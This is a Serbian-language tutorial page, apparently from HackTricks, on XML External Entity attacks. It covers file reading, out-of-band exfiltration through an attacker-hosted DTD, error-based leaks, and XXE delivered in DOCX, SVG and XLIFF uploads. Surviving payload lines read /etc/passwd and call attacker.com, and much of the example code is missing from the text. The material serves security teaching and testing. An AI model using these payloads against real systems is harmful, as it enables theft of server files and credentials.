XXE - XEE - XML External Entity
Last updated
Last updated
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
XML je jezik za označavanje dizajniran za skladištenje i transport podataka, sa fleksibilnom strukturom koja omogućava korišćenje opisno nazvanih oznaka. Razlikuje se od HTML-a po tome što nije ograničen na skup unapred definisanih oznaka. Značaj XML-a je opao sa porastom JSON-a, uprkos njegovoj početnoj ulozi u AJAX tehnologiji.
Predstavljanje podataka kroz entitete: Entiteti u XML-u omogućavaju predstavljanje podataka, uključujući specijalne karaktere kao što su <
i >
, koji odgovaraju <
i >
kako bi se izbegla sukob sa XML-ovim sistemom oznaka.
Definisanje XML elemenata: XML omogućava definisanje tipova elemenata, naglašavajući kako bi elementi trebali biti strukturirani i koji sadržaj mogu sadržati, od bilo koje vrste sadržaja do specifičnih podelemenata.
Definicija tipa dokumenta (DTD): DTD-ovi su ključni u XML-u za definisanje strukture dokumenta i tipova podataka koje može sadržati. Mogu biti unutrašnji, spoljašnji ili kombinacija, usmeravajući kako se dokumenti formatiraju i validiraju.
Prilagođeni i spoljašnji entiteti: XML podržava kreiranje prilagođenih entiteta unutar DTD-a za fleksibilnu reprezentaciju podataka. Spoljašnji entiteti, definisani URL-om, izazivaju bezbednosne brige, posebno u kontekstu napada XML Eksterna Entitet (XXE), koji koriste način na koji XML parseri obrađuju spoljne izvore podataka: <!DOCTYPE foo [ <!ENTITY myentity "value" > ]>
XXE detekcija sa parametarskim entitetima: Za detekciju XXE ranjivosti, posebno kada konvencionalne metode ne uspevaju zbog bezbednosnih mera parsera, mogu se koristiti XML parametarski entiteti. Ovi entiteti omogućavaju tehnike detekcije van opsega, kao što su pokretanje DNS upita ili HTTP zahteva ka kontrolisanoj domeni, kako bi se potvrdila ranjivost.
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>
U ovom napadu ću testirati da li jednostavna nova deklaracija ENTITETA funkcioniše.
Pokušajmo da pročitajmo /etc/passwd
na različite načine. Za Windows možete pokušati da pročitate: C:\windows\system32\drivers\etc\hosts
U ovom prvom slučaju primetite da će SYSTEM "**file:///**etc/passwd" takođe raditi.
Ovaj drugi slučaj bi trebao biti koristan za ekstrakciju fajla ako web server koristi PHP (Nije slučaj sa Portswigger laboratorijama)
U ovom trećem slučaju primetite da deklariramo Element stockCheck
kao ANY
U Java aplikacijama može biti moguće prikazati sadržaj direktorijuma putem XXE sa payload-om kao (samo tražeći direktorijum umesto datoteke):
XXE se može koristiti za zloupotrebu SSRF unutar oblaka
Koristeći prethodno komentarisanu tehniku, možete naterati server da pristupi serveru koji kontrolišete kako biste pokazali da je ranjiv. Ali, ako to ne funkcioniše, možda je to zato što XML entiteti nisu dozvoljeni, u tom slučaju možete pokušati koristiti XML parametarske entitete:
U ovom slučaju ćemo naterati server da učita novu DTD sa zloćudnim payload-om koji će poslati sadržaj datoteke putem HTTP zahteva (za višelinijske datoteke možete pokušati da ih ekstraktujete putem _ftp://_ koristeći ovaj osnovni server na primer xxe-ftp-server.rb). Ovo objašnjenje se zasniva na Portswigger lab ovde.
U datoj zloćudnoj DTD, sprovodi se niz koraka za ekstrakciju podataka:
Struktura je sledeća:
The steps executed by this DTD include:
Definicija Parametarskih Entiteta:
XML parametarski entitet, %file
, se kreira, čitajući sadržaj datoteke /etc/hostname
.
Drugi XML parametarski entitet, %eval
, se definiše. Dinamički deklarira novi XML parametarski entitet, %exfiltrate
. Entitet %exfiltrate
je postavljen da izvrši HTTP zahtev ka serveru napadača, prosleđujući sadržaj entiteta %file
unutar upitnog stringa URL-a.
Izvršenje Entiteta:
Entitet %eval
se koristi, što dovodi do izvršenja dinamičke deklaracije entiteta %exfiltrate
.
Entitet %exfiltrate
se zatim koristi, pokrećući HTTP zahtev ka specificiranom URL-u sa sadržajem datoteke.
Napadač hostuje ovaj zlonamerni DTD na serveru pod svojom kontrolom, obično na URL-u kao što je http://web-attacker.com/malicious.dtd
.
XXE Payload: Da bi iskoristio ranjivu aplikaciju, napadač šalje XXE payload:
Ovaj payload definiše XML parametarsku entitet %xxe
i uključuje je unutar DTD-a. Kada je obrađen od strane XML parsera, ovaj payload preuzima eksterni DTD sa napadačevog servera. Parser zatim interpretira DTD inline, izvršavajući korake navedene u zloćudnom DTD-u i dovodeći do eksfiltracije datoteke /etc/hostname
na napadačev server.
U ovom slučaju ćemo naterati server da učita zloćudni DTD koji će prikazati sadržaj datoteke unutar poruke o grešci (ovo je važno samo ako možete videti poruke o grešci). Primer odavde.
Poruku o grešci prilikom parsiranja XML-a, koja otkriva sadržaj datoteke /etc/passwd
, moguće je izazvati korišćenjem zloćudnog spoljnog Definicije tipa dokumenta (DTD). To se postiže kroz sledeće korake:
Definisan je XML parametarski entitet pod imenom file
, koji sadrži sadržaj datoteke /etc/passwd
.
Definisan je XML parametarski entitet pod imenom eval
, koji uključuje dinamičku deklaraciju za drugi XML parametarski entitet pod imenom error
. Ovaj error
entitet, kada se evaluira, pokušava da učita nepostojeću datoteku, uključujući sadržaj file
entiteta kao svoje ime.
eval
entitet se poziva, što dovodi do dinamičke deklaracije error
entiteta.
Poziv error
entiteta rezultira pokušajem učitavanja nepostojeće datoteke, proizvodeći poruku o grešci koja uključuje sadržaj datoteke /etc/passwd
kao deo imena datoteke.
Zloćudni eksterni DTD može se pozvati sa sledećim XML:
Upon execution, the web server's response should include an error message displaying the contents of the /etc/passwd
file.
Molimo vas da primetite da eksterni DTD omogućava uključivanje jedne entiteta unutar druge (eval
), ali je to zabranjeno u internom DTD. Stoga, ne možete izazvati grešku bez korišćenja eksternog DTD (obično).
Šta je sa slepim XXE ranjivostima kada su izvan-bend interakcije blokirane (eksterne konekcije nisu dostupne)?
Rupa u specifikaciji XML jezika može izložiti osetljive podatke kroz poruke o grešci kada se DTD dokumenta meša unutrašnje i eksterne deklaracije. Ovaj problem omogućava unutrašnju redefiniciju entiteta koji su deklarisani eksterno, olakšavajući izvršenje napada zasnovanih na grešci XXE. Takvi napadi koriste redefiniciju XML parametarskog entiteta, prvobitno deklarisanog u eksternom DTD, iz unutrašnjeg DTD. Kada su izvan-bend konekcije blokirane od strane servera, napadači moraju da se oslanjaju na lokalne DTD datoteke kako bi sproveli napad, sa ciljem da izazovu grešku u parsiranju kako bi otkrili osetljive informacije.
Razmotrite scenario u kojem datotečni sistem servera sadrži DTD datoteku na /usr/local/app/schema.dtd
, koja definiše entitet nazvan custom_entity
. Napadač može izazvati grešku u parsiranju XML-a otkrivajući sadržaj datoteke /etc/passwd
podnošenjem hibridnog DTD-a na sledeći način:
The outlined steps are executed by this DTD:
Definicija XML parametarskog entiteta nazvanog local_dtd
uključuje spoljašnju DTD datoteku smeštenu na datotečnom sistemu servera.
Redefinicija se dešava za custom_entity
XML parametarski entitet, prvobitno definisan u spoljašnjem DTD-u, kako bi se obuhvatio XXE exploit zasnovan na grešci. Ova redefinicija je dizajnirana da izazove grešku u parsiranju, otkrivajući sadržaj datoteke /etc/passwd
.
Korišćenjem local_dtd
entiteta, aktivira se spoljašnji DTD, obuhvatajući novodefinisani custom_entity
. Ova sekvenca akcija dovodi do emitovanja poruke o grešci koja je cilj exploita.
Real world example: Sistemi koji koriste GNOME radno okruženje često imaju DTD na /usr/share/yelp/dtd/docbookx.dtd
koji sadrži entitet nazvan ISOamso
Pošto ova tehnika koristi interni DTD, prvo morate pronaći važeći. To možete učiniti instaliranjem istog OS / Softvera koji server koristi i pretraživanjem nekih podrazumevanih DTD-ova, ili uzimanjem liste podrazumevanih DTD-ova unutar sistema i proverom da li neki od njih postoji:
Za više informacija proverite https://portswigger.net/web-security/xxe/blind
U sledećem sjajnom github repozitorijumu možete pronaći puteve DTD-ova koji mogu biti prisutni u sistemu:
Pored toga, ako imate Docker sliku žrtvovog sistema, možete koristiti alat iz istog repozitorijuma da skenirate sliku i pronađete putanju DTD-ova prisutnih unutar sistema. Pročitajte Readme na github-u da biste saznali kako.
Za detaljnije objašnjenje ovog napada, pogledajte drugi deo ovog neverovatnog posta od Detectify.
Mogućnost da se otpremaju Microsoft Office dokumenti nudi mnoge web aplikacije, koje zatim izvode određene detalje iz ovih dokumenata. Na primer, web aplikacija može omogućiti korisnicima da uvezu podatke otpremanjem XLSX formata tabele. Da bi parser izvukao podatke iz tabele, neizbežno će morati da analizira barem jedan XML fajl.
Da bi se testirala ova ranjivost, potrebno je kreirati Microsoft Office fajl koji sadrži XXE payload. Prvi korak je da se kreira prazan direktorijum u koji se dokument može raspakovati.
Kada je dokument raspakovan, XML fajl smešten u ./unzipped/word/document.xml
treba otvoriti i urediti u omiljenom tekst editoru (kao što je vim). XML treba modifikovati da uključuje željeni XXE payload, često počinjući sa HTTP zahtevom.
Modifikovane XML linije treba umetnuti između dva korenska XML objekta. Važno je zameniti URL sa URL-om koji se može pratiti za zahteve.
Na kraju, fajl se može ponovo zipovati da bi se kreirao zlonamerni poc.docx fajl. Iz prethodno kreiranog "unzipped" direktorijuma, treba pokrenuti sledeću komandu:
Sada se kreirani fajl može otpremiti na potencijalno ranjivu web aplikaciju, i može se nadati da će zahtev pojaviti u Burp Collaborator logovima.
jar protokol je dostupan isključivo unutar Java aplikacija. Dizajniran je da omogući pristup fajlovima unutar PKZIP arhive (npr., .zip
, .jar
, itd.), prilagođavajući se lokalnim i udaljenim fajlovima.
Da biste mogli da pristupite datotekama unutar PKZIP datoteka, to je izuzetno korisno za zloupotrebu XXE putem sistemskih DTD datoteka. Pogledajte ovu sekciju da biste saznali kako da zloupotrebite sistemske DTD datoteke.
Proces pristupanja datoteci unutar PKZIP arhive putem jar protokola uključuje nekoliko koraka:
HTTP zahtev se šalje za preuzimanje zip arhive sa određene lokacije, kao što je https://download.website.com/archive.zip
.
HTTP odgovor koji sadrži arhivu se privremeno čuva na sistemu, obično na lokaciji kao što je /tmp/...
.
Arhiva se zatim ekstrahuje da bi se pristupilo njenom sadržaju.
Konkretna datoteka unutar arhive, file.zip
, se čita.
Nakon operacije, sve privremene datoteke kreirane tokom ovog procesa se brišu.
Zanimljiva tehnika za prekidanje ovog procesa u drugom koraku uključuje održavanje server konekcije otvorenom neodređeno dok se služi arhivska datoteka. Alati dostupni na ovoj repozitoriji mogu se koristiti u tu svrhu, uključujući Python server (slow_http_server.py
) i Java server (slowserver.jar
).
Pisanje fajlova u privremenom direktorijumu može pomoći da se eskalira druga ranjivost koja uključuje prelazak putanje (kao što su lokalno uključivanje fajlova, injekcija šablona, XSLT RCE, deserializacija, itd).
Na Windows hostovima je moguće dobiti NTML hash korisnika web servera postavljanjem responder.py handler-a:
и слањем следећег захтева
Then you can try to crack the hash using hashcat
Kada integrišete klijentske podatke u XML dokumente na serverskoj strani, poput onih u backend SOAP zahtevima, direktna kontrola nad XML strukturom je često ograničena, što otežava tradicionalne XXE napade zbog ograničenja u modifikaciji DOCTYPE
elementa. Međutim, XInclude
napad pruža rešenje omogućavajući umetanje eksternih entiteta unutar bilo kog podatkovnog elementa XML dokumenta. Ova metoda je efikasna čak i kada se može kontrolisati samo deo podataka unutar XML dokumenta generisanog na serveru.
Da biste izvršili XInclude
napad, potrebno je deklarisati XInclude
prostor imena i navesti putanju do datoteke za željeni eksterni entitet. Ispod je sažet primer kako se takav napad može formulisati:
Check https://portswigger.net/web-security/xxe for more info!
Fajlovi koje korisnici otpremaju u određene aplikacije, a koji se zatim obrađuju na serveru, mogu iskoristiti ranjivosti u načinu na koji se obrađuju XML ili formati fajlova koji sadrže XML. Uobičajeni formati fajlova kao što su kancelarijski dokumenti (DOCX) i slike (SVG) zasnovani su na XML-u.
Kada korisnici otpremaju slike, te slike se obrađuju ili validiraju na strani servera. Čak i za aplikacije koje očekuju formate kao što su PNG ili JPEG, biblioteka za obradu slika na serveru može takođe podržavati SVG slike. SVG, kao format zasnovan na XML-u, može biti iskorišćen od strane napadača za slanje malicioznih SVG slika, čime se server izlaže XXE (XML External Entity) ranjivostima.
Primer takvog eksploata je prikazan ispod, gde maliciozna SVG slika pokušava da pročita sistemske fajlove:
Druga metoda uključuje pokušaj izvršavanja komandi putem PHP "expect" omota:
U oba slučaja, SVG format se koristi za pokretanje napada koji iskorišćavaju XML procesne mogućnosti softvera servera, ističući potrebu za robusnom validacijom ulaza i bezbednosnim merama.
Proverite https://portswigger.net/web-security/xxe za više informacija!
Napomena: prva linija pročitanog fajla ili rezultat izvršenja će se pojaviti UNUTAR kreirane slike. Tako da treba da imate pristup slici koju je SVG kreirao.
Pročitajte sledeći post da naučite kako da iskoristite XXE učitavanjem PDF fajla:
PDF Upload - XXE and CORS bypassAko POST zahtev prihvata podatke u XML formatu, mogli biste pokušati da iskoristite XXE u tom zahtevu. Na primer, ako normalan zahtev sadrži sledeće:
Тада бисте могли да пошаљете следећи захтев, са истим резултатом:
Da biste promenili zahtev, možete koristiti Burp ekstenziju pod nazivom “Content Type Converter“. Ovde možete pronaći ovaj primer:
Još jedan primer se može naći ovde.
Ovo funkcioniše samo ako XML server prihvata data://
protokol.
Možete koristiti ["Encode Recipe" od cyberchef-a ovde ]([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) da transformiše u UTF-7.
Ako web koristi PHP, umesto file:/
možete koristiti php wrappersphp://filter/convert.base64-encode/resource=
da pristupite internim datotekama.
Ako web koristi Javu, možete proveriti jar: protocol.
Trik sa https://github.com/Ambrotd/XXE-Notes Možete kreirati entitet unutar entiteta kodirajući ga sa html entitetima i zatim ga pozvati da učita dtd. Napomena da HTML Entiteti koji se koriste moraju biti numerički (kao [u ovom primeru](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).
DTD пример:
Izvuci index.php
Ako je PHP "expect" modul učitan
Ovaj primer je inspirisan u https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe
XLIFF (XML format za razmenu lokalizacije) se koristi za standardizaciju razmene podataka u procesima lokalizacije. To je XML-bazirani format koji se prvenstveno koristi za prenos lokalizovanih podataka među alatima tokom lokalizacije i kao zajednički format razmene za CAT (računarski potpomognuta prevođenja) alate.
Zahtev se šalje serveru sa sledećim sadržajem:
Međutim, ovaj zahtev izaziva grešku unutrašnjeg servera, posebno pominjući problem sa deklaracijama markup-a:
I pored greške, zabeležen je hit na Burp Collaborator, što ukazuje na određeni nivo interakcije sa spoljnim entitetom.
Out of Band Data Exfiltration Da bi se exfiltrirali podaci, šalje se modifikovani zahtev:
Ovaj pristup otkriva da User Agent ukazuje na korišćenje Java 1.8. Zapaženo ograničenje sa ovom verzijom Jave je nemogućnost preuzimanja fajlova koji sadrže karakter novog reda, kao što je /etc/passwd, koristeći Out of Band tehniku.
Ekstrakcija podataka zasnovana na grešci Da bi se prevazišlo ovo ograničenje, koristi se pristup zasnovan na grešci. DTD fajl je strukturiran na sledeći način da izazove grešku koja uključuje podatke iz ciljnog fajla:
Server odgovara greškom, što je važno jer odražava nepostojeći fajl, ukazujući da server pokušava da pristupi navedenom fajlu:
Da bi se sadržaj datoteke uključio u poruku o grešci, DTD datoteka se prilagođava:
Ova modifikacija dovodi do uspešne eksfiltracije sadržaja datoteke, jer se odražava u izlazu greške poslatom putem HTTP-a. To ukazuje na uspešan XXE (XML External Entity) napad, koristeći tehnike Out of Band i Error-Based za ekstrakciju osetljivih informacija.
Validan XML u RSS formatu za iskorišćavanje XXE ranjivosti.
Jednostavan HTTP zahtev ka serveru napadača
Korišćenje PHP base64 filtera
XMLDecoder je Java klasa koja kreira objekte na osnovu XML poruke. Ako zlonameran korisnik može da natera aplikaciju da koristi proizvoljne podatke u pozivu metodi readObject, odmah će dobiti izvršenje koda na serveru.
Izvuci informacije putem HTTP koristeći vlastiti spoljašnji DTD: https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/\
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)